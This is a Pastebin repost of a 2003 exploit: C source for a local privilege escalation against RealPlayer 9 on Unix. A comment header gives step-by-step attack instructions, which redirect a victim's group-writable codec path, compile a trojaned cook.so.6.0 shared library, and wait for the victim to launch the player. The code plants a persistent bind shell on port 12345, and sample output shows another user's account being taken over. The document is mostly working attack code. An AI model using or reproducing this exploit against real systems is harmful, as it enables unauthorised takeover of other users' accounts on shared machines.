Advertisement
FlyFar

RealPlayer 9 *nix - Local Privilege Escalation

Mar 13th, 2024
515
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 6.24 KB | Cybersecurity | 0 0
  1. /**
  2.  * rp9-priv-esc.c
  3.  *
  4.  * A local privilege escalation attack against the community supported
  5.  * version of Real.com's Realplayer, version 9.
  6.  *
  7.  * Written by:
  8.  *  
  9.  *  Jon Hart warchild spoofed.org
  10.  *
  11.  * By default, configuration files are stored in ~$USER/.realnetworks/,
  12.  * but all the files in there are group writeable.  So long as ~$USER
  13.  * has group execution permissions (which is pretty common), a malicious
  14.  * local user can edit the config files of fellow users to do his biddings.  
  15.  *
  16.  * There are a number of ways to attack this, but after some poking it seems
  17.  * that modifying the path to shared libraries and writing my own malicious
  18.  * shared libraries was the easiest.  
  19.  *
  20.  * (as an aside, just because the shared libraries in the directories contained
  21.  * in ~$USER/.realnetworks/RealShared_0_0/ are stripped doesn't mean we can't get
  22.  * the symbols back.  objdump quickly can tell us what the names of the 15
  23.  * functions are, and we can stub out a bogus shared library pretty quickly.)
  24.  *
  25.  * This particular bit of code is meant to replace the shared library
  26.  * cook.so.6.0, which is contained in the Codecs directory.  To execute this
  27.  * attack against a fellow local user, first edit their config file
  28.  * (~victim/.realnetworks/RealShared_0_0) to have the 'dt_codecs' variable
  29.  * point to a directory under your control, like /tmp/Codecs.  Copy all of the
  30.  * existing files from the previous value of dt_codecs (which is usually something
  31.  * like ~victim/Real/Codecs/) to /tmp/Codecs.  Next, compile the code below as a
  32.  * shared library and copy it to the trojaned directory:
  33.  *
  34.  *
  35.  * `gcc -shared -fPIC -o /tmp/Codecs/cook.so.6.0 rp9-priv-esc.c`
  36.  *
  37.  *  The next time the victim fires up realplayer 9, a nice little shell
  38.  * will be listening on port 12345 for you:
  39.  *
  40.  * guest@haiti:/$ id
  41.  * uid=1006(guest) gid=100(users) groups=100(users)
  42.  * guest@haiti:/$ nc localhost 12345
  43.  * id
  44.  * uid=1000(warchild) gid=100(users) groups=100(users),40(src),1003(wheel)
  45.  *
  46.  * Of course, you don't have to execute a shell.  Do whatever makes you happy.
  47.  *
  48.  * Fix?  `chmod 700 ~/.realnetworks/*`
  49.  *
  50.  *  Copyright (c) 2003, Jon Hart
  51.  * All rights reserved.
  52.  *
  53.  *  Redistribution and use in source and binary forms, with or without modification,
  54.  *  are permitted provided that the following conditions are met:
  55.  *
  56.  *  * Redistributions of source code must retain the above copyright notice,
  57.  *    this list of conditions and the following disclaimer.
  58.  *  * Redistributions in binary form must reproduce the above copyright notice,
  59.  *    this list of conditions and the following disclaimer in the documentation
  60.  *    and/or other materials provided with the distribution.
  61.  *  * Neither the name of the organization nor the names of its contributors may
  62.  *    be used to endorse or promote products derived from this software without
  63.  *    specific prior written permission.
  64.  *
  65.  *
  66.  *  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
  67.  *  AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
  68.  *  IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
  69.  *  ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
  70.  *  LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
  71.  *  DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
  72.  *  SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
  73.  *  CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
  74.  *  OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
  75.  *  USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
  76.  *
  77.  *
  78.  *
  79.  *
  80.  */
  81. #define PORT 12345
  82. #include <stdio.h>
  83. #include <signal.h>
  84. #include <sys/types.h>
  85. #include <sys/socket.h>
  86. #include <netinet/in.h>
  87. #include <stdlib.h>
  88.  
  89. void RAInitEncoder(void) { }
  90. /** This just happens to be one of the first
  91.  * functions that realplayer calls after cook.so.6.0 is loaded
  92.  */
  93. void RAOpenCodec2(void) { cookthis(); }
  94. void RAOpenCodec(void) {  }
  95. void RAGetNumberOfFlavors(void) {  }
  96. void RACloseCodec(void) {  }
  97. void RADecode(void) {  }
  98. void RAEncode(void) {  }
  99. void RAFreeEncoder(void) {  }
  100. void RAGetNumberOfFlavors2(void) {  }
  101. void RAFreeDecoder(void) {  }
  102. void RAFlush(void) {  }
  103. void RAGetFlavorProperty(void) {  }
  104. void G2(void) { }
  105. void RASetFlavor(void) {  }
  106. void RAInitDecoder(void) {  }
  107. void RACreateEncoderInstance(void) { }
  108.  
  109. /* Bind /bin/sh to PORT.  It forks
  110.  * and all that good stuff, so it won't
  111.  * easily go away.
  112.  */
  113. int cookthis() {
  114.  
  115.  
  116.         int sock_des, sock_client, sock_recv, sock_len, server_pid, client_pid;
  117.         struct sockaddr_in server_addr;
  118.         struct sockaddr_in client_addr;
  119.  
  120.         if ((sock_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
  121.                 exit(EXIT_FAILURE);
  122.  
  123.         bzero((char *) &server_addr, sizeof(server_addr));
  124.         server_addr.sin_family = AF_INET;
  125.         server_addr.sin_addr.s_addr = htonl(INADDR_ANY);
  126.         server_addr.sin_port = htons(PORT);
  127.  
  128.         if ((sock_recv = bind(sock_des, (struct sockaddr *) &server_addr, sizeof(server_addr))) != 0)
  129.                 exit(EXIT_FAILURE);
  130.         if (fork() != 0)
  131.                 exit(EXIT_SUCCESS);
  132.         setpgrp();  
  133.         signal(SIGHUP, SIG_IGN);
  134.         if (fork() != 0)
  135.                 exit(EXIT_SUCCESS);
  136.         if ((sock_recv = listen(sock_des, 5)) != 0)
  137.                 exit(EXIT_SUCCESS);
  138.         while (1) {
  139.                 sock_len = sizeof(client_addr);
  140.                 if ((sock_client = accept(sock_des, (struct sockaddr *) &client_addr, &sock_len)) < 0)
  141.                         exit(EXIT_SUCCESS);
  142.                 client_pid = getpid();
  143.                 server_pid = fork();
  144.                 if (server_pid != 0) {
  145.                         dup2(sock_client,0);
  146.                         dup2(sock_client,1);
  147.                         dup2(sock_client,2);
  148.  
  149.                         execl("/bin/sh","realplay",(char *)0);
  150.                         close(sock_client);
  151.                         exit(EXIT_SUCCESS);
  152.                 }
  153.                 close(sock_client);
  154.         }
  155. }
  156.  
  157.  
  158.  
  159.  
  160. // milw0rm.com [2003-09-09]
  161.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement